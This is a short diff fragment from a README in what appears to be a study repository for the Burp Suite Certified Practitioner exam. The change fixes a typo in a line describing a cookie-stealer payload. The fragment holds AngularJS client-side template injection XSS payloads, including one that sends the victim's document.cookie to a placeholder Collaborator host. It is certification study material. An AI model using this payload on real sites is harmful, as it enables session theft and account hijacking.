botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 {{$on.constructor('alert(1)')()}}
 ```

->Cookie stealer payload that can be placed in iframe, hosted on an exploit server, resulting in the victim session cookie being send to Burp Cllaborator.
+>Cookie stealer payload that can be placed in iframe, hosted on an exploit server, resulting in the victim session cookie being send to Burp Collaborator.

 ```JavaScript
 {{$on.constructor('document.location="https://COLLABORATOR.com?c="+document.cookie')()}}